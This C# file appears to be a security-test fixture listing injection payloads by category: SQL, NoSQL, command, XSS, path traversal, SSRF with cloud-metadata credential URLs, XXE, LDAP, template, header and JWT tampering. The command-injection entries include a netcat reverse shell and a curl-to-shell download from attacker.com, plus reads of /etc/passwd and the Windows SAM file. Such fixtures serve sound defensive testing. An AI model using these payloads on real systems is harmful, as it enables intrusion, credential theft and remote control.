// =============================================================================
// MaliciousPayloads.cs
// Collection of malicious payloads for security testing
// Reference: OWASP Testing Guide, PayloadsAllTheThings
// =============================================================================

namespace StellaOps.Security.Tests.Infrastructure;

/// <summary>
/// Malicious payloads for testing input validation and injection vulnerabilities.
/// Organized by attack category for use in security tests.
/// </summary>
public static class MaliciousPayloads
{
    /// <summary>
    /// SQL injection payloads for testing database query handling.
    /// </summary>
    public static class SqlInjection
    {
        public static readonly string[] Common =
        [
            "' OR '1'='1",
            "'; DROP TABLE users; --",
            "1' OR '1'='1' /*",
            "admin'--",
            "1; SELECT * FROM users",
            "' UNION SELECT * FROM users --",
            "1' AND '1'='1",
            "'; WAITFOR DELAY '0:0:5' --",
            "' OR 1=1 --",
            "'; EXEC xp_cmdshell('whoami'); --"
        ];

        public static readonly string[] Blind =
        [
            "1' AND SLEEP(5) --",
            "1' AND (SELECT COUNT(*) FROM users) > 0 --",
            "' OR IF(1=1, SLEEP(5), 0) --",
            "1; IF(1=1) WAITFOR DELAY '0:0:5' --"
        ];

        public static readonly string[] NoSql =
        [
            "{ \"$gt\": \"\" }",
            "{ \"$where\": \"this.password.length > 0\" }",
            "{ \"$regex\": \".*\" }",
            "'; return true; var x='",
            "{ \"$ne\": null }"
        ];
    }

    /// <summary>
    /// Command injection payloads for testing shell command handling.
    /// </summary>
    public static class CommandInjection
    {
        public static readonly string[] Unix =
        [
            "; cat /etc/passwd",
            "| ls -la",
            "`whoami`",
            "$(id)",
            "; nc -e /bin/sh attacker.com 4444",
            "& ping -c 5 attacker.com",
            "|| touch /tmp/pwned",
            "; curl http://attacker.com/shell.sh | sh"
        ];

        public static readonly string[] Windows =
        [
            "& dir",
            "| type C:\\Windows\\System32\\config\\SAM",
            "; net user",
            "& whoami",
            "| powershell -c \"Invoke-WebRequest -Uri http://attacker.com\"",
            "; cmd /c dir"
        ];

        public static readonly string[] Generic =
        [
            ";",
            "|",
            "&",
            "&&",
            "||",
            "\n",
            "\r\n",
            "`",
            "$(",
            "#{",
            "%0a"
        ];
    }

    /// <summary>
    /// Path traversal payloads for testing file system access.
    /// </summary>
    public static class PathTraversal
    {
        public static readonly string[] Common =
        [
            "../../../etc/passwd",
            "..\\..\\..\\Windows\\System32\\config\\SAM",
            "....//....//....//etc/passwd",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
            "..%252f..%252f..%252fetc/passwd",
            "/etc/passwd%00.jpg",
            "....\\\\....\\\\....\\\\Windows\\System32\\drivers\\etc\\hosts"
        ];

        public static readonly string[] Null =
        [
            "../../../etc/passwd%00",
            "..\\..\\..\\boot.ini%00",
            "%00../../../etc/passwd"
        ];
    }

    /// <summary>
    /// XSS payloads for testing cross-site scripting vulnerabilities.
    /// </summary>
    public static class Xss
    {
        public static readonly string[] Script =
        [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg/onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "<body onload=alert('XSS')>",
            "<iframe src=\"javascript:alert('XSS')\">",
            "'><script>alert('XSS')</script>",
            "\"><script>alert('XSS')</script>"
        ];

        public static readonly string[] Encoded =
        [
            "%3Cscript%3Ealert('XSS')%3C/script%3E",
            "&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;",
            "\\u003cscript\\u003ealert('XSS')\\u003c/script\\u003e"
        ];
    }

    /// <summary>
    /// SSRF payloads for testing server-side request forgery.
    /// </summary>
    public static class Ssrf
    {
        public static readonly string[] InternalUrls =
        [
            "http://127.0.0.1",
            "http://localhost",
            "http://0.0.0.0",
            "http://[::1]",
            "http://169.254.169.254/latest/meta-data/",
            "http://metadata.google.internal/",
            "http://192.168.1.1",
            "http://10.0.0.1",
            "file:///etc/passwd"
        ];

        public static readonly string[] Bypass =
        [
            "http://127.0.0.1.nip.io",
            "http://0x7f000001",
            "http://2130706433",
            "http://0177.0.0.1",
            "http://127.1",
            "http://spoofed.burpcollaborator.net"
        ];

        public static readonly string[] CloudMetadata =
        [
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "http://metadata.google.internal/computeMetadata/v1/",
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
        ];
    }

    /// <summary>
    /// Header injection payloads for testing HTTP header handling.
    /// </summary>
    public static class HeaderInjection
    {
        public static readonly string[] Common =
        [
            "value\r\nX-Injected: header",
            "value%0d%0aX-Injected: header",
            "value\nSet-Cookie: malicious=true",
            "value\r\n\r\n<html>injected</html>"
        ];
    }

    /// <summary>
    /// LDAP injection payloads for testing LDAP query handling.
    /// </summary>
    public static class LdapInjection
    {
        public static readonly string[] Common =
        [
            "*",
            "*)(&",
            "*)(uid=*))(|(uid=*",
            "admin)(&)",
            "x)(|(cn=*)"
        ];
    }

    /// <summary>
    /// XML injection payloads (XXE) for testing XML parsing.
    /// </summary>
    public static class XxeInjection
    {
        public static readonly string[] Common =
        [
            "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
            "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://attacker.com/\">]><foo>&xxe;</foo>",
            "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/xxe.dtd\">%xxe;]>"
        ];
    }

    /// <summary>
    /// Template injection payloads for testing template engines.
    /// </summary>
    public static class TemplateInjection
    {
        public static readonly string[] Common =
        [
            "{{7*7}}",
            "${7*7}",
            "<%= 7*7 %>",
            "#{7*7}",
            "*{7*7}",
            "@(7*7)",
            "{{constructor.constructor('return this')()}}"
        ];
    }

    /// <summary>
    /// JWT-related attack payloads for testing token handling.
    /// </summary>
    public static class JwtAttacks
    {
        public const string NoneAlgorithm = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.";
        public const string EmptySignature = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.";
        public const string AlgorithmConfusion = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9"; // Would need key confusion attack
    }
}